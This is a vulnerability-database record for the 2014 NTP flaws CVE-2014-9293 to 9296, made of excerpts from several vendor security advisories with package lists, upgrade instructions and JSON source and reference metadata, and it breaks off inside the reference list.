CVE-2014-9293 CVE-2014-9294 CVE-2014-9295 \n CVE-2014-9296 \n=====================================================================\n\n1. Summary:\n\nUpdated ntp packages that fix several security issues are now available for\nRed Hat Enterprise Linux 6.5 Extended Update Support. \n\nRed Hat Product Security has rated this update as having Important security\nimpact. Common Vulnerability Scoring System (CVSS) base scores, which give\ndetailed severity ratings, are available for each vulnerability from the\nCVE links in the References section. \n\n2. Relevant releases/architectures:\n\nRed Hat Enterprise Linux Compute Node Optional EUS (v. 6.5) - noarch, x86_64\nRed Hat Enterprise Linux HPC Node EUS (v. 6.5) - x86_64\nRed Hat Enterprise Linux Server EUS (v. 6.5) - i386, ppc64, s390x, x86_64\nRed Hat Enterprise Linux Server Optional EUS (v. 6.5) - i386, noarch, ppc64, s390x, x86_64\n\n3. \n\nMultiple buffer overflow flaws were discovered in ntpd\u0027s crypto_recv(),\nctl_putdata(), and configure() functions. Note: the crypto_recv() flaw requires non-default\nconfigurations to be active, while the ctl_putdata() flaw, by default, can\nonly be exploited via local attackers, and the configure() flaw requires\nadditional authentication to exploit. (CVE-2014-9295)\n\nIt was found that ntpd automatically generated weak keys for its internal\nuse if no ntpdc request authentication key was specified in the ntp.conf\nconfiguration file. A remote attacker able to match the configured IP\nrestrictions could guess the generated key, and possibly use it to send\nntpdc query or configuration requests. (CVE-2014-9293)\n\nIt was found that ntp-keygen used a weak method for generating MD5 keys. \nThis could possibly allow an attacker to guess generated MD5 keys that\ncould then be used to spoof an NTP client or server. Note: it is\nrecommended to regenerate any MD5 keys that had explicitly been generated\nwith ntp-keygen; the default installation does not contain such keys. \n(CVE-2014-9294)\n\nA missing return statement in the receive() function could potentially\nallow a remote attacker to bypass NTP\u0027s authentication mechanism. \n(CVE-2014-9296)\n\nAll ntp users are advised to upgrade to this updated package, which\ncontains backported patches to resolve these issues. After installing the\nupdate, the ntpd daemon will restart automatically. \n\n4. Solution:\n\nBefore applying this update, make sure all previously released errata \nrelevant to your system have been applied. \n\nThis update is available via the Red Hat Network. Details on how to use the\nRed Hat Network to apply this update are available at \nhttps://access.redhat.com/articles/11258\n\n5. Bugs fixed (https://bugzilla.redhat.com/):\n\n1176032 - CVE-2014-9293 ntp: automatic generation of weak default key in config_auth()\n1176035 - CVE-2014-9294 ntp: ntp-keygen uses weak random number generator and seed when generating MD5 keys\n1176037 - CVE-2014-9295 ntp: Multiple buffer overflows via specially-crafted packets\n1176040 - CVE-2014-9296 ntp: receive() missing return on error\n\n6. Package List:\n\nRed Hat Enterprise Linux HPC Node EUS (v. 6.5):\n\nSource:\nntp-4.2.6p5-2.el6_5.src.rpm\n\nx86_64:\nntp-4.2.6p5-2.el6_5.x86_64.rpm\nntp-debuginfo-4.2.6p5-2.el6_5.x86_64.rpm\nntpdate-4.2.6p5-2.el6_5.x86_64.rpm\n\nRed Hat Enterprise Linux Compute Node Optional EUS (v. 6.5):\n\nSource:\nntp-4.2.6p5-2.el6_5.src.rpm\n\nnoarch:\nntp-doc-4.2.6p5-2.el6_5.noarch.rpm\n\nx86_64:\nntp-debuginfo-4.2.6p5-2.el6_5.x86_64.rpm\nntp-perl-4.2.6p5-2.el6_5.x86_64.rpm\n\nRed Hat Enterprise Linux Server EUS (v. 6.5):\n\nSource:\nntp-4.2.6p5-2.el6_5.src.rpm\n\ni386:\nntp-4.2.6p5-2.el6_5.i686.rpm\nntp-debuginfo-4.2.6p5-2.el6_5.i686.rpm\nntpdate-4.2.6p5-2.el6_5.i686.rpm\n\nppc64:\nntp-4.2.6p5-2.el6_5.ppc64.rpm\nntp-debuginfo-4.2.6p5-2.el6_5.ppc64.rpm\nntpdate-4.2.6p5-2.el6_5.ppc64.rpm\n\ns390x:\nntp-4.2.6p5-2.el6_5.s390x.rpm\nntp-debuginfo-4.2.6p5-2.el6_5.s390x.rpm\nntpdate-4.2.6p5-2.el6_5.s390x.rpm\n\nx86_64:\nntp-4.2.6p5-2.el6_5.x86_64.rpm\nntp-debuginfo-4.2.6p5-2.el6_5.x86_64.rpm\nntpdate-4.2.6p5-2.el6_5.x86_64.rpm\n\nRed Hat Enterprise Linux Server Optional EUS (v. 6.5):\n\nSource:\nntp-4.2.6p5-2.el6_5.src.rpm\n\ni386:\nntp-debuginfo-4.2.6p5-2.el6_5.i686.rpm\nntp-perl-4.2.6p5-2.el6_5.i686.rpm\n\nnoarch:\nntp-doc-4.2.6p5-2.el6_5.noarch.rpm\n\nppc64:\nntp-debuginfo-4.2.6p5-2.el6_5.ppc64.rpm\nntp-perl-4.2.6p5-2.el6_5.ppc64.rpm\n\ns390x:\nntp-debuginfo-4.2.6p5-2.el6_5.s390x.rpm\nntp-perl-4.2.6p5-2.el6_5.s390x.rpm\n\nx86_64:\nntp-debuginfo-4.2.6p5-2.el6_5.x86_64.rpm\nntp-perl-4.2.6p5-2.el6_5.x86_64.rpm\n\nThese packages are GPG signed by Red Hat for security. Our key and\ndetails on how to verify the signature are available from\nhttps://access.redhat.com/security/team/key/\n\n7. References:\n\nhttps://access.redhat.com/security/cve/CVE-2014-9293\nhttps://access.redhat.com/security/cve/CVE-2014-9294\nhttps://access.redhat.com/security/cve/CVE-2014-9295\nhttps://access.redhat.com/security/cve/CVE-2014-9296\nhttps://access.redhat.com/security/updates/classification/#important\n\n8. Contact:\n\nThe Red Hat security contact is \u003csecalert@redhat.com\u003e. More contact\ndetails at https://access.redhat.com/security/team/contact/\n\nCopyright 2015 Red Hat, Inc. \n-----BEGIN PGP SIGNATURE-----\nVersion: GnuPG v1\n\niD8DBQFUyTXWXlSAg2UNWIIRAsXzAKCilJuJeeWLOABs1xY+ueRvRTSpWACcDhoC\nYQlhn66RRMYQCWymo1OCUoI=\n=4Rft\n-----END PGP SIGNATURE-----\n\n\n--\nRHSA-announce mailing list\nRHSA-announce@redhat.com\nhttps://www.redhat.com/mailman/listinfo/rhsa-announce\n. \n\nRelease Date: 2015-02-18\nLast Updated: 2015-02-18\n\nPotential Security Impact: Remote execution of code, Denial of Service (DoS),\nor other vulnerabilities\n\nSource: Hewlett-Packard Company, HP Software Security Response Team\n\nVULNERABILITY SUMMARY\nPotential security vulnerabilities have been identified with HP-UX running\nNTP. These could be exploited remotely to execute code, create a Denial of\nService (DoS), or other vulnerabilities. \n\nReferences:\n\nCVE-2014-9293 - Insufficient Entropy in Pseudo-Random Number Generator (PRNG)\n(CWE-332)\nCVE-2014-9294 - Use of Cryptographically Weak PRNG (CWE-338)\nCVE-2014-9295 - Stack Buffer Overflow (CWE-121)\nCVE-2014-9296 - Error Conditions, Return Values, Status Codes (CWE-389)\nCVE-2014-9297 - Improper Check for Unusual or Exceptional Conditions\n(CWE-754)\nSSRT101872\nVU#852879\n\nSUPPORTED SOFTWARE VERSIONS*: ONLY impacted versions are listed. \n\nHP-UX B.11.31 running NTP version C.4.2.6.4.0 or previous\nHP-UX B.11.23 running XNTP version 3.5 or previous\n\nBACKGROUND\n\nCVSS 2.0 Base Metrics\n===========================================================\n Reference Base Vector Base Score\nCVE-2014-9293 (AV:N/AC:L/Au:N/C:P/I:P/A:P) 7.5\nCVE-2014-9294 (AV:N/AC:L/Au:N/C:P/I:P/A:P) 7.5\nCVE-2014-9295 (AV:N/AC:L/Au:N/C:P/I:P/A:P) 7.5\nCVE-2014-9296 (AV:N/AC:L/Au:N/C:N/I:N/A:P) 5.0\nCVE-2014-9297 (AV:N/AC:H/Au:N/C:P/I:N/A:N) 2.6\n===========================================================\n Information on CVSS is documented\n in HP Customer Notice: HPSN-2008-002\n\nRESOLUTION\n\nHP has provided the following patch for HP-UX B.11.31. A workaround for HP-UX\nB.11.23 and B.11.11 to temporarily resolve these vulnerabilities follows\nbelow. \n\nThe B.11.31 patch is available from:\nftp://ntp42650:Secure12@h2.usa.hp.com or https://h20392.www2.hp.com/portal/sw\ndepot/displayProductInfo.do?productNumber=HPUX-NTP\n\nMitigation steps for HP-UX B.11.23 and B.11.11 for CVE-2014-9295\n\nRestrict query for server status (Time Service is not affected) from\nntpq/ntpdc by enabling .noquery. using the restrict command in /etc/ntp.conf\nfile. \n\nReference: http://support.ntp.org/bin/view/Main/SecurityNotice\n\nNOTE: This bulletin will be revised when patches for XNTP v3.5 on B.11.23 and\nB.11.11 become available. \n\nMANUAL ACTIONS: No\n\nPRODUCT SPECIFIC INFORMATION\n\nHP-UX Software Assistant: HP-UX Software Assistant is an enhanced application\nthat replaces HP-UX Security Patch Check. It analyzes all Security Bulletins\nissued by HP and lists recommended actions that may apply to a specific HP-UX\nsystem. It can also download patches and create a depot automatically. For\nmore information see: https://www.hp.com/go/swa\n\nThe following text is for use by the HP-UX Software Assistant. \n\nAFFECTED VERSIONS\n\nHP-UX B.11.31\n==================\nNTP.INETSVCS2-BOOT\nNTP.NTP-AUX\nNTP.NTP-RUN\naction: install revision C.4.2.6.5.0 or subsequent\n\nEND AFFECTED VERSIONS\n\nHISTORY\nVersion:1 (rev.1) - 18 February 2015 Initial release\n\nThird Party Security Patches: Third party security patches that are to be\ninstalled on systems running HP software products should be applied in\naccordance with the customer\u0027s patch management policy. \n\nSupport: For issues about implementing the recommendations of this Security\nBulletin, contact normal HP Services support channel. For other issues about\nthe content of this Security Bulletin, send e-mail to security-alert@hp.com. \n\nReport: To report a potential security vulnerability with any HP supported\nproduct, send Email to: security-alert@hp.com\n\nSubscribe: To initiate a subscription to receive future HP Security Bulletin\nalerts via Email:\nhttp://h41183.www4.hp.com/signup_alerts.php?jumpid=hpsc_secbulletins\n\nSecurity Bulletin Archive: A list of recently released Security Bulletins is\navailable here:\nhttps://h20564.www2.hp.com/portal/site/hpsc/public/kb/secBullArchive/\n\nSoftware Product Category: The Software Product Category is represented in\nthe title by the two characters following HPSB. \n\n3C = 3COM\n3P = 3rd Party Software\nGN = HP General Software\nHF = HP Hardware and Firmware\nMP = MPE/iX\nMU = Multi-Platform Software\nNS = NonStop Servers\nOV = OpenVMS\nPI = Printing and Imaging\nPV = ProCurve\nST = Storage Software\nTU = Tru64 UNIX\nUX = HP-UX\n\nCopyright 2015 Hewlett-Packard Development Company, L.P. \nHewlett-Packard Company shall not be liable for technical or editorial errors\nor omissions contained herein. The information provided is provided \"as is\"\nwithout warranty of any kind. To the extent permitted by law, neither HP or\nits affiliates, subcontractors or suppliers will be liable for\nincidental,special or consequential damages including downtime cost; lost\nprofits; damages relating to the procurement of substitute products or\nservices; or damages for loss of data, or software restoration. The\ninformation in this document is subject to change without notice. \nHewlett-Packard Company and the names of Hewlett-Packard products referenced\nherein are trademarks of Hewlett-Packard Company in the United States and\nother countries. Other product and company names mentioned herein may be\ntrademarks of their respective owners. \n\n\nHere are the details from the Slackware 14.1 ChangeLog:\n+--------------------------+\npatches/packages/ntp-4.2.8-i486-1_slack14.1.txz: Upgraded. \n In addition to bug fixes and enhancements, this release fixes\n several high-severity vulnerabilities discovered by Neel Mehta\n and Stephen Roettger of the Google Security Team. \n For more information, see:\n https://www.kb.cert.org/vuls/id/852879\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-9293\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-9294\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-9295\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-9296\n (* Security fix *)\n+--------------------------+\n\n\nWhere to find the new packages:\n+-----------------------------+\n\nThanks to the friendly folks at the OSU Open Source Lab\n(http://osuosl.org) for donating FTP and rsync hosting\nto the Slackware project! :-)\n\nAlso see the \"Get Slack\" section on http://slackware.com for\nadditional mirror sites near you. \n\nUpdated package for Slackware 13.0:\nftp://ftp.slackware.com/pub/slackware/slackware-13.0/patches/packages/ntp-4.2.8-i486-1_slack13.0.txz\n\nUpdated package for Slackware x86_64 13.0:\nftp://ftp.slackware.com/pub/slackware/slackware64-13.0/patches/packages/ntp-4.2.8-x86_64-1_slack13.0.txz\n\nUpdated package for Slackware 13.1:\nftp://ftp.slackware.com/pub/slackware/slackware-13.1/patches/packages/ntp-4.2.8-i486-1_slack13.1.txz\n\nUpdated package for Slackware x86_64 13.1:\nftp://ftp.slackware.com/pub/slackware/slackware64-13.1/patches/packages/ntp-4.2.8-x86_64-1_slack13.1.txz\n\nUpdated package for Slackware 13.37:\nftp://ftp.slackware.com/pub/slackware/slackware-13.37/patches/packages/ntp-4.2.8-i486-1_slack13.37.txz\n\nUpdated package for Slackware x86_64 13.37:\nftp://ftp.slackware.com/pub/slackware/slackware64-13.37/patches/packages/ntp-4.2.8-x86_64-1_slack13.37.txz\n\nUpdated package for Slackware 14.0:\nftp://ftp.slackware.com/pub/slackware/slackware-14.0/patches/packages/ntp-4.2.8-i486-1_slack14.0.txz\n\nUpdated package for Slackware x86_64 14.0:\nftp://ftp.slackware.com/pub/slackware/slackware64-14.0/patches/packages/ntp-4.2.8-x86_64-1_slack14.0.txz\n\nUpdated package for Slackware 14.1:\nftp://ftp.slackware.com/pub/slackware/slackware-14.1/patches/packages/ntp-4.2.8-i486-1_slack14.1.txz\n\nUpdated package for Slackware x86_64 14.1:\nftp://ftp.slackware.com/pub/slackware/slackware64-14.1/patches/packages/ntp-4.2.8-x86_64-1_slack14.1.txz\n\nUpdated package for Slackware -current:\nftp://ftp.slackware.com/pub/slackware/slackware-current/slackware/n/ntp-4.2.8-i486-1.txz\n\nUpdated package for Slackware x86_64 -current:\nftp://ftp.slackware.com/pub/slackware/slackware64-current/slackware64/n/ntp-4.2.8-x86_64-1.txz\n\n\nMD5 signatures:\n+-------------+\n\nSlackware 13.0 package:\n18d7f09e90cf2434f59d7e9f11478fba ntp-4.2.8-i486-1_slack13.0.txz\n\nSlackware x86_64 13.0 package:\nedd178e3d2636433dd18f52331af17a5 ntp-4.2.8-x86_64-1_slack13.0.txz\n\nSlackware 13.1 package:\n4b6da6fa564b1fe00920d402ff97bd43 ntp-4.2.8-i486-1_slack13.1.txz\n\nSlackware x86_64 13.1 package:\n292ae7dbd3ea593c5e28cbba7c2b71fa ntp-4.2.8-x86_64-1_slack13.1.txz\n\nSlackware 13.37 package:\n294b8197d360f9a3cf8186619b60b73c ntp-4.2.8-i486-1_slack13.37.txz\n\nSlackware x86_64 13.37 package:\n7cd5b63f8371b1cc369bc56e4b4efd5a ntp-4.2.8-x86_64-1_slack13.37.txz\n\nSlackware 14.0 package:\n32eab67538c33e4669bda9200799a497 ntp-4.2.8-i486-1_slack14.0.txz\n\nSlackware x86_64 14.0 package:\n33ecf4845fa8533a12a98879815bde08 ntp-4.2.8-x86_64-1_slack14.0.txz\n\nSlackware 14.1 package:\nf2b45a45c846a909ae201176ce359939 ntp-4.2.8-i486-1_slack14.1.txz\n\nSlackware x86_64 14.1 package:\n12d7ab6e2541af4d1282621d3773e7f7 ntp-4.2.8-x86_64-1_slack14.1.txz\n\nSlackware -current package:\n5b2150cee9840d8bb547098cccde879a n/ntp-4.2.8-i486-1.txz\n\nSlackware x86_64 -current package:\n9ce09c5d6a60d3e2117988e4551e4af1 n/ntp-4.2.8-x86_64-1.txz\n\n\nInstallation instructions:\n+------------------------+\n\nUpgrade the package as root:\n# upgradepkg ntp-4.2.8-i486-1_slack14.1.txz\n\nThen, restart the NTP daemon:\n\n# sh /etc/rc.d/rc.ntpd restart\n\n\n+-----+\n\nSlackware Linux Security Team\nhttp://slackware.com/gpg-key\nsecurity@slackware.com\n\n+------------------------------------------------------------------------+\n| To leave the slackware-security mailing list: |\n+------------------------------------------------------------------------+\n| Send an email to majordomo@slackware.com with this text in the body of |\n| the email message: |\n| |\n| unsubscribe slackware-security |\n| |\n| You will get a confirmation message back containing instructions to |\n| complete the process. Please do not reply to this email address. \n\nReferences:\n\nCVE-2014-9293\nCVE-2014-9294\nCVE-2014-9295\nCVE-2014-9296\nCVE-2013-5211\nSSRT102239\n\nSUPPORTED SOFTWARE VERSIONS*: ONLY impacted versions are listed. \n\n Platform\n Patch Kit Name\n\n Alpha IA64 V8.4\n 75-117-380_2015-08-24.BCK\n\n NOTE: Please contact OpenVMS Technical Support to request these patch kits. The net-misc/ntp package contains the official reference\nimplementation by the NTP Project. \n\nAffected packages\n=================\n\n -------------------------------------------------------------------\n Package / Vulnerable / Unaffected\n -------------------------------------------------------------------\n 1 net-misc/ntp \u003c 4.2.8 \u003e= 4.2.8\n\nDescription\n===========\n\nMultiple vulnerabilities have been discovered in NTP. Please review the\nCVE identifiers referenced below for details. \n\nResolution\n==========\n\nAll NTP users should upgrade to the latest version:\n\n # emerge --sync\n # emerge --ask --oneshot --verbose \"\u003e=net-misc/ntp-4.2.8\"\n\nReferences\n==========\n\n[ 1 ] CVE-2014-9293\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-9293\n[ 2 ] CVE-2014-9294\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-9294\n[ 3 ] CVE-2014-9295\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-9295\n[ 4 ] CVE-2014-9296\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-9296\n\nAvailability\n============\n\nThis GLSA and any updates to it are available for viewing at\nthe Gentoo Security Website:\n\n http://security.gentoo.org/glsa/glsa-201412-34.xml\n\nConcerns?\n=========\n\nSecurity is a primary focus of Gentoo Linux and ensuring the\nconfidentiality and security of our users\u0027 machines is of utmost\nimportance to us. Any security concerns should be addressed to\nsecurity@gentoo.org or alternatively, you may file a bug at\nhttps://bugs.gentoo.org. \n\nLicense\n=======\n\nCopyright 2014 Gentoo Foundation, Inc; referenced text\nbelongs to its owner(s). \n\nThe contents of this document are licensed under the\nCreative Commons - Attribution / Share Alike license. \n\nhttp://creativecommons.org/licenses/by-sa/2.5\n", "sources": [ { "db": "NVD", "id": "CVE-2014-9295" }, { "db": "CERT/CC", "id": "VU#852879" }, { "db": "JVNDB", "id": "JVNDB-2014-007352" }, { "db": "BID", "id": "71761" }, { "db": "VULMON", "id": "CVE-2014-9295" }, { "db": "PACKETSTORM", "id": "129716" }, { "db": "PACKETSTORM", "id": "129793" }, { "db": "PACKETSTORM", "id": "134756" }, { "db": "PACKETSTORM", "id": "130140" }, { "db": "PACKETSTORM", "id": "130481" }, { "db": "PACKETSTORM", "id": "129693" }, { "db": "PACKETSTORM", "id": "133517" }, { "db": "PACKETSTORM", "id": "129683" }, { "db": "PACKETSTORM", "id": "129723" } ], "trust": 3.51 }, "external_ids": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/external_ids#", "data": { "@container": "@list" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": [ { "db": "CERT/CC", "id": "VU#852879", "trust": 3.2 }, { "db": "NVD", "id": "CVE-2014-9295", "trust": 3.1 }, { "db": "BID", "id": "71761", "trust": 1.4 }, { "db": "ICS CERT", "id": "ICSA-14-353-01", "trust": 1.2 }, { "db": "SECUNIA", "id": "62209", "trust": 1.1 }, { "db": "MCAFEE", "id": "SB10103", "trust": 1.1 }, { "db": "ICS CERT", "id": "ICSA-14-353-01C", "trust": 0.8 }, { "db": "JVN", "id": "JVNVU96605606", "trust": 0.8 }, { "db": "JVNDB", "id": "JVNDB-2014-007352", "trust": 0.8 }, { "db": "ICS CERT", "id": "ICSA-14-353-01A", "trust": 0.3 }, { "db": "JUNIPER", "id": "JSA10663", "trust": 0.3 }, { "db": "VULMON", "id": "CVE-2014-9295", "trust": 0.1 }, { "db": "PACKETSTORM", "id": "129716", "trust": 0.1 }, { "db": "PACKETSTORM", "id": "129793", "trust": 0.1 }, { "db": "PACKETSTORM", "id": "134756", "trust": 0.1 }, { "db": "PACKETSTORM", "id": "130140", "trust": 0.1 }, { "db": "PACKETSTORM", "id": "130481", "trust": 0.1 }, { "db": "PACKETSTORM", "id": "129693", "trust": 0.1 }, { "db": "PACKETSTORM", "id": "133517", "trust": 0.1 }, { "db": "PACKETSTORM", "id": "129683", "trust": 0.1 }, { "db": "PACKETSTORM", "id": "129723", "trust": 0.1 } ], "sources": [ { "db": "CERT/CC", "id": "VU#852879" }, { "db": "VULMON", "id": "CVE-2014-9295" }, { "db": "BID", "id": "71761" }, { "db": "JVNDB", "id": "JVNDB-2014-007352" }, { "db": "PACKETSTORM", "id": "129716" }, { "db": "PACKETSTORM", "id": "129793" }, { "db": "PACKETSTORM", "id": "134756" }, { "db": "PACKETSTORM", "id": "130140" }, { "db": "PACKETSTORM", "id": "130481" }, { "db": "PACKETSTORM", "id": "129693" }, { "db": "PACKETSTORM", "id": "133517" }, { "db": "PACKETSTORM", "id": "129683" }, { "db": "PACKETSTORM", "id": "129723" }, { "db": "NVD", "id": "CVE-2014-9295" } ] }, "id": "VAR-201412-0613", "iot": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/iot#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": true, "sources": [ { "db": "VARIoT devices database", "id": null } ], "trust": 0.38256410625 }, "last_update_date": "2024-07-23T21:56:37.541000Z", "patch": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/patch#", "data": { "@container": "@list" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": [ { "title": "ntp-4.2.2p1-18.0.1.AXS3", "trust": 0.8, "url": "https://tsn.miraclelinux.com/tsn_local/index.php?m=errata\u0026a=detail\u0026eid=4191\u0026stype=\u0026sproduct=\u0026published=1" }, { "title": "ntp-4.2.6p5-2.0.2.AXS4", "trust": 0.8, "url": "https://tsn.miraclelinux.com/tsn_local/index.php?m=errata\u0026a=detail\u0026eid=4190\u0026stype=\u0026sproduct=\u0026published=1" }, { "title": "cisco-sa-20141222-ntpd", "trust": 0.8, "url": "http://tools.cisco.com/security/center/content/ciscosecurityadvisory/cisco-sa-20141222-ntpd" }, { "title": "HPSBGN03277 SSRT101957", "trust": 0.8, "url": "http://h20000.www2.hp.com/bizsupport/techsupport/document.jsp?lang=en\u0026cc=us\u0026objectid=c04582466" }, { "title": "HPSBPV03266 SSRT101878", "trust": 0.8, "url": "http://h20000.www2.hp.com/bizsupport/techsupport/document.jsp?lang=en\u0026cc=us\u0026objectid=c04574882" }, { "title": "NV15-009", "trust": 0.8, "url": "http://jpn.nec.com/security-info/secinfo/nv15-009.html" }, { "title": "Bug 2667", "trust": 0.8, "url": "http://bugs.ntp.org/show_bug.cgi?id=2667" }, { "title": "Bug 2668", "trust": 0.8, "url": "http://bugs.ntp.org/show_bug.cgi?id=2668" }, { "title": "Bug 2669", "trust": 0.8, "url": "http://bugs.ntp.org/show_bug.cgi?id=2669" }, { "title": "All diffs for ChangeSet 1.3246", "trust": 0.8, "url": "http://bk1.ntp.org/ntp-dev/?page=patch\u0026rev=548acc4dn1tbm1trjrbpca4yc1atda" }, { "title": "All diffs for ChangeSet 1.3247", "trust": 0.8, "url": "http://bk1.ntp.org/ntp-dev/?page=patch\u0026rev=548acdf3tusfizxcv_x4b77jt_y-cg" }, { "title": "All diffs for ChangeSet 1.3248", "trust": 0.8, "url": "http://bk1.ntp.org/ntp-dev/?page=patch\u0026rev=548acf55dxkfhb6muyqwzu8edls97g" }, { "title": "SecurityNotice", "trust": 0.8, "url": "http://support.ntp.org/bin/view/main/securitynotice" }, { "title": "Bug 1176037", "trust": 0.8, "url": "https://bugzilla.redhat.com/show_bug.cgi?id=1176037" }, { "title": "RHSA-2014:2025", "trust": 0.8, "url": "https://rhn.redhat.com/errata/rhsa-2014-2025.html" }, { "title": "RHSA-2015:0104", "trust": 0.8, "url": "https://rhn.redhat.com/errata/rhsa-2015-0104.html" }, { "title": "Multiple vulnerabilities in NTP", "trust": 0.8, "url": "https://blogs.oracle.com/sunsecurity/entry/multiple_vulnerabilities_in_ntp" }, { "title": "\u300cNetwork Time Protocol daemon (ntpd) \u306b\u8907\u6570\u306e\u8106\u5f31\u6027\u300d\u306eSEIL\u30b7\u30ea\u30fc\u30ba\u3078\u306e\u5f71\u97ff\u306b\u3064\u3044\u3066", "trust": 0.8, "url": "http://www.seil.jp/support/security/a01515.html" }, { "title": "\u30b5\u30fc\u30d0\u30fb\u30af\u30e9\u30a4\u30a2\u30f3\u30c8\u88fd\u54c1 Network Time Protocol daemon (ntpd)\u306e\u8106\u5f31\u6027(CVE-2014-9293\u301c9296)\u306b\u3088\u308b\u5f71\u97ff\u306b\u3064\u3044\u3066", "trust": 0.8, "url": "http://www.hitachi.co.jp/products/it/server/security/info/vulnerable/ntpd_cve-2014-9293.html" }, { "title": "cisco-sa-20141222-ntpd", "trust": 0.8, "url": "http://www.cisco.com/cisco/web/support/jp/112/1127/1127934_cisco-sa-20141222-ntpd-j.html" }, { "title": "Red Hat: Important: ntp security update", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=red_hat_security_advisories\u0026qid=rhsa-20142025 - security advisory" }, { "title": "Red Hat: Important: ntp security update", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=red_hat_security_advisories\u0026qid=rhsa-20150104 - security advisory" }, { "title": "Red Hat: Important: ntp security update", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=red_hat_security_advisories\u0026qid=rhsa-20142024 - security advisory" }, { "title": "Debian CVElist Bug Report Logs: ntp: CVE-2014-9293 CVE-2014-9294 CVE-2014-9295 CVE-2014-9296", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=debian_cvelist_bugreportlogs\u0026qid=1bb105aaeb75e38cf89e5f63d6e49db9" }, { "title": "Red Hat: CVE-2014-9295", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=red_hat_cve_database\u0026qid=cve-2014-9295" }, { "title": "Ubuntu Security Notice: ntp vulnerabilities", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=ubuntu_security_notice\u0026qid=usn-2449-1" }, { "title": "Debian Security Advisories: DSA-3108-1 ntp -- security update", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=debian_security_advisories\u0026qid=d5c63d464b27e49c6a53057fab75a16d" }, { "title": "Amazon Linux AMI: ALAS-2014-462", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=amazon_linux_ami\u0026qid=alas-2014-462" }, { "title": "Tenable Security Advisories: [R3] Tenable Appliance Affected by NTP Vulnerabilities", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=tenable_security_advisories\u0026qid=tns-2015-01" }, { "title": "Citrix Security Bulletins: Citrix Security Advisory for NTP Vulnerabilities", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=citrix_security_bulletins\u0026qid=e9432b762bf2c2945bfb43af8d6842d5" }, { "title": "Oracle: Oracle Critical Patch Update Advisory - October 2016", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=oracle_advisories\u0026qid=05aabe19d38058b7814ef5514aab4c0c" }, { "title": "osx-10.7-ntp", "trust": 0.1, "url": "https://github.com/opragel/osx-10.7-ntp " }, { "title": "ntp", "trust": 0.1, "url": "https://github.com/sous-chefs/ntp " }, { "title": "ntp", "trust": 0.1, "url": "https://github.com/chef-cookbooks/ntp " }, { "title": "LinuxFlaw", "trust": 0.1, "url": "https://github.com/mudongliang/linuxflaw " } ], "sources": [ { "db": "VULMON", "id": "CVE-2014-9295" }, { "db": "JVNDB", "id": "JVNDB-2014-007352" } ] }, "problemtype_data": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/problemtype_data#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": [ { "problemtype": "CWE-119", "trust": 1.8 } ], "sources": [ { "db": "JVNDB", "id": "JVNDB-2014-007352" }, { "db": "NVD", "id": "CVE-2014-9295" } ] }, "references": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/references#", "data": { "@container": "@list" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": [ { "trust": 2.4, "url": "http://www.kb.cert.org/vuls/id/852879" }, { "trust": 2.2, "url": "https://tools.cisco.com/security/center/content/ciscosecurityadvisory/cisco-sa-20141222-ntpd" }, { "trust": 2.0, "url": "http://support.ntp.org/bin/view/main/securitynotice" }, { "trust": 2.0, "url": "http://advisories.mageia.org/mgasa-2014-0541.html" }, { "trust": 1.6, "url": "http://lists.ntp.org/pipermail/announce/2014-december/000122.html" }, { "trust": 1.4, "url": "http://www.oracle.com/technetwork/security-advisory/cpuoct2016-2881722.html" }, { "trust": 1.2, "url": "http://rhn.redhat.com/errata/rhsa-2014-2025.html" }, { "trust": 1.2, "url": "http://rhn.redhat.com/errata/rhsa-2015-0104.html" }, { "trust": 1.1, "url": "https://ics-cert.us-cert.gov/advisories/icsa-14-353-01" }, { "trust": 1.1, "url": "https://support.apple.com/en-us/ht6601" }, { "trust": 1.1, "url": "http://bk1.ntp.org/ntp-dev/?page=patch\u0026rev=548acf55dxkfhb6muyqwzu8edls97g" }, { "trust": 1.1, "url": "https://bugzilla.redhat.com/show_bug.cgi?id=1176037" }, { "trust": 1.1, "url": "http://bugs.ntp.org/show_bug.cgi?id=2668" }, { "trust": 1.1, "url": "http://bugs.ntp.org/show_bug.cgi?id=2667" }, { "trust": 1.1, "url": "http://bk1.ntp.org/ntp-dev/?page=patch\u0026rev=548acdf3tusfizxcv_x4b77jt_y-cg" }, { "trust": 1.1, "url": "http://bugs.ntp.org/show_bug.cgi?id=2669" }, { "trust": 1.1, "url": "http://bk1.ntp.org/ntp-dev/?page=patch\u0026rev=548acc4dn1tbm1trjrbpca4yc1atda" }, { "trust": 1.1, "url": "http://marc.info/?l=bugtraq\u0026m=142469153211996\u0026w=2" }, { "trust": 1.1, "url": "http://marc.info/?l=bugtraq\u0026m=142590659431171\u0026w=2" }, { "trust": 1.1, "url": 